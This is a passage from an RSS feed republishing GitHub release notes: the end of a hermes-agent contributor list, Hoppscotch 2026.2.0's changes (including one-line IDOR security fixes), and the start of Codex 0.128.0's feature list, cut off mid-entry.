<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Satoshi-agi/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Satoshi-agi">@Satoshi-agi</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/scheidti/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/scheidti">@scheidti</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/scotttrinh/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/scotttrinh">@scotttrinh</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/season179/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/season179">@season179</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/SeeYangZhi/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/SeeYangZhi">@SeeYangZhi</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/sgaofen/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/sgaofen">@sgaofen</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shamork/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shamork">@shamork</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shannonsands/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shannonsands">@shannonsands</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/SHL0MS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/SHL0MS">@SHL0MS</a>,<br>
<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/simbam99/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/simbam99">@simbam99</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Societus/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Societus">@Societus</a>, @socrates1024, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Sonoyunchu/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Sonoyunchu">@Sonoyunchu</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/sprmn24/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/sprmn24">@sprmn24</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stephenschoettler/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stephenschoettler">@stephenschoettler</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/tangyuanjc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/tangyuanjc">@tangyuanjc</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/TechPrototyper/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/TechPrototyper">@TechPrototyper</a>,<br>
<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/tekgnosis-net/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/tekgnosis-net">@tekgnosis-net</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ThomassJonax/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ThomassJonax">@ThomassJonax</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/tmimmanuel/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/tmimmanuel">@tmimmanuel</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/tochukwuada/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/tochukwuada">@tochukwuada</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Tosko4/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Tosko4">@Tosko4</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Tranquil-Flow/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Tranquil-Flow">@Tranquil-Flow</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/twozle/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/twozle">@twozle</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/txbxxx/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/txbxxx">@txbxxx</a>,<br>
<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/UgwujaGeorge/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/UgwujaGeorge">@UgwujaGeorge</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/versun/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/versun">@versun</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vlwkaos/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vlwkaos">@vlwkaos</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/voidborne-d/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/voidborne-d">@voidborne-d</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vominh1919/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vominh1919">@vominh1919</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Wang-tianhao/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Wang-tianhao">@Wang-tianhao</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Wangshengyang2004/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Wangshengyang2004">@Wangshengyang2004</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/web3blind/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/web3blind">@web3blind</a>,<br>
<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/westers/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/westers">@westers</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/wysie/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/wysie">@wysie</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/xandersbell/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/xandersbell">@xandersbell</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/xiahu88988/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/xiahu88988">@xiahu88988</a>, @XieNBi, @xinbenlv, @xnbi, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/y0shua1ee/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/y0shua1ee">@y0shua1ee</a>, @yatesjalex, @yes999zc,<br>
@yeyitech, @Yoimex, @YueLich, @Yukipukii1, @zhiyanliu, @zicochaos, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Zjianru/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Zjianru">@Zjianru</a>, @zkl2333, @zons-zhaozhy,<br>
@ztexydt-cqh.</p>
<p>Also: @Siddharth Balyan, @YuShu.</p>
<hr>
<p><strong>Full Changelog</strong>: <a href="https://github.com/NousResearch/hermes-agent/compare/v2026.4.23...v2026.4.30">v2026.4.23...v2026.4.30</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[2026.2.0]]></title>
<description><![CDATA[This release introduces API documentation versioning, a unified dropdown-based switcher for Cloud orgs tier, and scripting sandbox reliability improvements, alongside security patches, bug fixes, and enhancements.
Read more at: https://hoppscotch.com/blog/hoppscotch-v2026-2-0.
NoteThis release in...]]></description>
<link>https://tsecurity.de/de/3487799/downloads/202620/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3487799/downloads/202620/</guid>
<pubDate>Tue, 05 May 2026 02:17:09 +0200</pubDate>
<category>💾 Downloads</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>This release introduces API documentation versioning, a unified dropdown-based switcher for Cloud orgs tier, and scripting sandbox reliability improvements, alongside security patches, bug fixes, and enhancements.</p>
<p>Read more at: <a href="https://hoppscotch.com/blog/hoppscotch-v2026-2-0" rel="nofollow">https://hoppscotch.com/blog/hoppscotch-v2026-2-0</a>.</p>
<div class="markdown-alert markdown-alert-note"><p class="markdown-alert-title"><svg class="octicon octicon-info mr-2" viewbox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="M0 8a8 8 0 1 1 16 0A8 8 0 0 1 0 8Zm8-6.5a6.5 6.5 0 1 0 0 13 6.5 6.5 0 0 0 0-13ZM6.5 7.75A.75.75 0 0 1 7.25 7h1a.75.75 0 0 1 .75.75v2.75h.25a.75.75 0 0 1 0 1.5h-2a.75.75 0 0 1 0-1.5h.25v-2h-.25a.75.75 0 0 1-.75-.75ZM8 6a1 1 0 1 1 0-2 1 1 0 0 1 0 2Z"></path></svg>Note</p><p>This release includes database migrations required for the API Documentation versioning feature. If you are self-hosting, please ensure you run the latest migrations after upgrading. Please refer to the <a href="https://docs.hoppscotch.io/documentation/self-host/community-edition/install-and-build#running-migrations" rel="nofollow">documentation</a> for more context.</p>
</div>
<h2>What's Changed</h2>
<ul>
<li>feat(common): URL encode/decode context menu actions by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/KanhaiyaPandey/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/KanhaiyaPandey">@KanhaiyaPandey</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3829148725" data-permission-text="Title is private" data-url="https://github.com/hoppscotch/hoppscotch/issues/5782" data-hovercard-type="pull_request" data-hovercard-url="/hoppscotch/hoppscotch/pull/5782/hovercard" href="https://github.com/hoppscotch/hoppscotch/pull/5782">#5782</a></li>
<li>fix(common): correctly resolve secret environment variables in basic auth header by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/aviu16/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/aviu16">@aviu16</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3938836558" data-permission-text="Title is private" data-url="https://github.com/hoppscotch/hoppscotch/issues/5879" data-hovercard-type="pull_request" data-hovercard-url="/hoppscotch/hoppscotch/pull/5879/hovercard" href="https://github.com/hoppscotch/hoppscotch/pull/5879">#5879</a></li>
<li>fix: auto-recover from corrupted sandbox state by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jamesgeorge007/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jamesgeorge007">@jamesgeorge007</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3932208479" data-permission-text="Title is private" data-url="https://github.com/hoppscotch/hoppscotch/issues/5874" data-hovercard-type="pull_request" data-hovercard-url="/hoppscotch/hoppscotch/pull/5874/hovercard" href="https://github.com/hoppscotch/hoppscotch/pull/5874">#5874</a></li>
<li>fix(common): improve responsive layout and overflow in realtime pages by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/chandraprakash-pandey/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/chandraprakash-pandey">@chandraprakash-pandey</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3903179268" data-permission-text="Title is private" data-url="https://github.com/hoppscotch/hoppscotch/issues/5843" data-hovercard-type="pull_request" data-hovercard-url="/hoppscotch/hoppscotch/pull/5843/hovercard" href="https://github.com/hoppscotch/hoppscotch/pull/5843">#5843</a></li>
<li>chore: security patch for the dependency chain <code>v2026.2.0</code> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mirarifhasan/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mirarifhasan">@mirarifhasan</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3953928612" data-permission-text="Title is private" data-url="https://github.com/hoppscotch/hoppscotch/issues/5887" data-hovercard-type="pull_request" data-hovercard-url="/hoppscotch/hoppscotch/pull/5887/hovercard" href="https://github.com/hoppscotch/hoppscotch/pull/5887">#5887</a></li>
<li>feat(sh-admin): add search and pagination to teams list by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Leon-Luu/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Leon-Luu">@Leon-Luu</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3855206975" data-permission-text="Title is private" data-url="https://github.com/hoppscotch/hoppscotch/issues/5803" data-hovercard-type="pull_request" data-hovercard-url="/hoppscotch/hoppscotch/pull/5803/hovercard" href="https://github.com/hoppscotch/hoppscotch/pull/5803">#5803</a></li>
<li>chore(common): deprecate legacy interceptor system by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/CuriousCorrelation/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/CuriousCorrelation">@CuriousCorrelation</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3895205360" data-permission-text="Title is private" data-url="https://github.com/hoppscotch/hoppscotch/issues/5830" data-hovercard-type="pull_request" data-hovercard-url="/hoppscotch/hoppscotch/pull/5830/hovercard" href="https://github.com/hoppscotch/hoppscotch/pull/5830">#5830</a></li>
<li>chore(common): update <code>Czech</code> locale with improved translations by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/lubomirblazekcz/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/lubomirblazekcz">@lubomirblazekcz</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3968233916" data-permission-text="Title is private" data-url="https://github.com/hoppscotch/hoppscotch/issues/5895" data-hovercard-type="pull_request" data-hovercard-url="/hoppscotch/hoppscotch/pull/5895/hovercard" href="https://github.com/hoppscotch/hoppscotch/pull/5895">#5895</a></li>
<li>fix(backend): resolve security advisories for IDOR and onboarding bypass by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mirarifhasan/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mirarifhasan">@mirarifhasan</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3974754082" data-permission-text="Title is private" data-url="https://github.com/hoppscotch/hoppscotch/issues/5897" data-hovercard-type="pull_request" data-hovercard-url="/hoppscotch/hoppscotch/pull/5897/hovercard" href="https://github.com/hoppscotch/hoppscotch/pull/5897">#5897</a></li>
<li>feat(common): add foundational support for dropdown-based organization switcher by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jamesgeorge007/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jamesgeorge007">@jamesgeorge007</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3963911634" data-permission-text="Title is private" data-url="https://github.com/hoppscotch/hoppscotch/issues/5890" data-hovercard-type="pull_request" data-hovercard-url="/hoppscotch/hoppscotch/pull/5890/hovercard" href="https://github.com/hoppscotch/hoppscotch/pull/5890">#5890</a></li>
<li>feat: api documentation versioning by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mirarifhasan/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mirarifhasan">@mirarifhasan</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3706744736" data-permission-text="Title is private" data-url="https://github.com/hoppscotch/hoppscotch/issues/5676" data-hovercard-type="pull_request" data-hovercard-url="/hoppscotch/hoppscotch/pull/5676/hovercard" href="https://github.com/hoppscotch/hoppscotch/pull/5676">#5676</a></li>
<li>fix(common): constrain variable tooltip to viewport for long values by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/aviu16/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/aviu16">@aviu16</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3937093270" data-permission-text="Title is private" data-url="https://github.com/hoppscotch/hoppscotch/issues/5878" data-hovercard-type="pull_request" data-hovercard-url="/hoppscotch/hoppscotch/pull/5878/hovercard" href="https://github.com/hoppscotch/hoppscotch/pull/5878">#5878</a></li>
<li>fix(common): resolve TypeError when opening request from search results by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Leon-Luu/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Leon-Luu">@Leon-Luu</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3902317496" data-permission-text="Title is private" data-url="https://github.com/hoppscotch/hoppscotch/issues/5842" data-hovercard-type="pull_request" data-hovercard-url="/hoppscotch/hoppscotch/pull/5842/hovercard" href="https://github.com/hoppscotch/hoppscotch/pull/5842">#5842</a></li>
<li>fix(common): increase modal dialog width for more screen sizes by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/iDschepe/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/iDschepe">@iDschepe</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3952193253" data-permission-text="Title is private" data-url="https://github.com/hoppscotch/hoppscotch/issues/5884" data-hovercard-type="pull_request" data-hovercard-url="/hoppscotch/hoppscotch/pull/5884/hovercard" href="https://github.com/hoppscotch/hoppscotch/pull/5884">#5884</a></li>
<li>feat(desktop): cloud for orgs platform contract by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/CuriousCorrelation/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/CuriousCorrelation">@CuriousCorrelation</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3983037660" data-permission-text="Title is private" data-url="https://github.com/hoppscotch/hoppscotch/issues/5903" data-hovercard-type="pull_request" data-hovercard-url="/hoppscotch/hoppscotch/pull/5903/hovercard" href="https://github.com/hoppscotch/hoppscotch/pull/5903">#5903</a></li>
<li>fix(backend): prevent IDOR in user collection and request endpoints by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mirarifhasan/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mirarifhasan">@mirarifhasan</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3982704693" data-permission-text="Title is private" data-url="https://github.com/hoppscotch/hoppscotch/issues/5902" data-hovercard-type="pull_request" data-hovercard-url="/hoppscotch/hoppscotch/pull/5902/hovercard" href="https://github.com/hoppscotch/hoppscotch/pull/5902">#5902</a></li>
</ul>
<h2>New Contributors</h2>
<ul>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/KanhaiyaPandey/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/KanhaiyaPandey">@KanhaiyaPandey</a> made their first contribution in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3829148725" data-permission-text="Title is private" data-url="https://github.com/hoppscotch/hoppscotch/issues/5782" data-hovercard-type="pull_request" data-hovercard-url="/hoppscotch/hoppscotch/pull/5782/hovercard" href="https://github.com/hoppscotch/hoppscotch/pull/5782">#5782</a></li>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/aviu16/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/aviu16">@aviu16</a> made their first contribution in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3938836558" data-permission-text="Title is private" data-url="https://github.com/hoppscotch/hoppscotch/issues/5879" data-hovercard-type="pull_request" data-hovercard-url="/hoppscotch/hoppscotch/pull/5879/hovercard" href="https://github.com/hoppscotch/hoppscotch/pull/5879">#5879</a></li>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/chandraprakash-pandey/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/chandraprakash-pandey">@chandraprakash-pandey</a> made their first contribution in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3903179268" data-permission-text="Title is private" data-url="https://github.com/hoppscotch/hoppscotch/issues/5843" data-hovercard-type="pull_request" data-hovercard-url="/hoppscotch/hoppscotch/pull/5843/hovercard" href="https://github.com/hoppscotch/hoppscotch/pull/5843">#5843</a></li>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/lubomirblazekcz/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/lubomirblazekcz">@lubomirblazekcz</a> made their first contribution in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3968233916" data-permission-text="Title is private" data-url="https://github.com/hoppscotch/hoppscotch/issues/5895" data-hovercard-type="pull_request" data-hovercard-url="/hoppscotch/hoppscotch/pull/5895/hovercard" href="https://github.com/hoppscotch/hoppscotch/pull/5895">#5895</a></li>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/iDschepe/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/iDschepe">@iDschepe</a> made their first contribution in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3952193253" data-permission-text="Title is private" data-url="https://github.com/hoppscotch/hoppscotch/issues/5884" data-hovercard-type="pull_request" data-hovercard-url="/hoppscotch/hoppscotch/pull/5884/hovercard" href="https://github.com/hoppscotch/hoppscotch/pull/5884">#5884</a></li>
</ul>
<p><strong>Full Changelog</strong>: <a class="commit-link" href="https://github.com/hoppscotch/hoppscotch/compare/2026.1.1...2026.2.0"><tt>2026.1.1...2026.2.0</tt></a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[0.128.0]]></title>
<description><![CDATA[New Features

Added persisted /goal workflows with app-server APIs, model tools, runtime continuation, and TUI controls for create, pause, resume, and clear. (#18073, #18074, #18075, #18076, #18077, #20082)
Added codex update, configurable TUI keymaps, plan-mode nudges, action-required terminal t...]]></description>
<link>https://tsecurity.de/de/3487654/downloads/01280/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3487654/downloads/01280/</guid>
<pubDate>Tue, 05 May 2026 02:01:48 +0200</pubDate>
<category>💾 Downloads</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h2>New Features</h2>
<ul>
<li>Added persisted <code>/goal</code> workflows with app-server APIs, model tools, runtime continuation, and TUI controls for create, pause, resume, and clear. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4273300761" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/18073" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/18073/hovercard" href="https://github.com/openai/codex/pull/18073">#18073</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4273301147" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/18074" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/18074/hovercard" href="https://github.com/openai/codex/pull/18074">#18074</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4273301542" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/18075" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/18075/hovercard" href="https://github.com/openai/codex/pull/18075">#18075</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4273302057" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/18076" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/18076/hovercard" href="https://github.com/openai/codex/pull/18076">#18076</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4273302413" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/18077" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/18077/hovercard" href="https://github.com/openai/codex/pull/18077">#18077</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4346060024" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/20082" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/20082/hovercard" href="https://github.com/openai/codex/pull/20082">#20082</a>)</li>
<li>Added <code>codex update</code>, configurable TUI keymaps, plan-mode nudges, action-required terminal titles, and active-turn <code>/statusline</code> and <code>/title</code> edits. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4340887957" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/19933" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/19933/hovercard" href="https://github.com/openai/codex/pull/19933">#19933</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4291981891" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/18593" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/18593/hovercard" href="https://github.com/openai/codex/pull/18593">#18593</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4339770449" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/19901" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/19901/hovercard" href="https://github.com/openai/codex/pull/19901">#19901</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4284635268" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/18372" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/18372/hovercard" href="https://github.com/openai/codex/pull/18372">#18372</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4340273802" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/19917" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/19917/hovercard" href="https://github.com/openai/codex/pull/19917">#19917</a>)</li>
<li>Expanded permission profiles with built-in defaults, sandbox CLI profile selection, cwd controls, and active-profile metadata for clients. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4339748404" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/19900" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/19900/hovercard" href="https://github.com/openai/codex/pull/19900">#19900</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4347354208" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/20117" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/20117/hovercard" href="https://github.com/openai/codex/pull/20117">#20117</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4347354604" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/20118" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/20118/hovercard" href="https://github.com/openai/codex/pull/20118">#20118</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4346792843" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/20095" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/20095/hovercard" href="https://github.com/openai/codex/pull/20095">#20095</a>)</li>
<li>Improved plugin workflows with marketplace installation, remote bundle caching, remote uninstall, plugin-bundled hooks, hook enablement state, and external-agent config import. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4297539287" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/18704" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/18704/hovercard" href="https://github.com/openai/codex/pull/18704">#18704</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4340225439" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/19914" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/19914/hovercard" href="https://github.com/openai/codex/pull/19914">#19914</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4325935276" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/19456" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/19456/hovercard" href="https://github.com/openai/codex/pull/19456">#19456</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4331872937" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/19705" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/19705/hovercard" href="https://github.com/openai/codex/pull/19705">#19705</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4337793807" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/19840" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/19840/hovercard" href="https://github.com/openai/codex/pull/19840">#19840</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4341541772" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/19949" data-hovercard-type="pull_request" 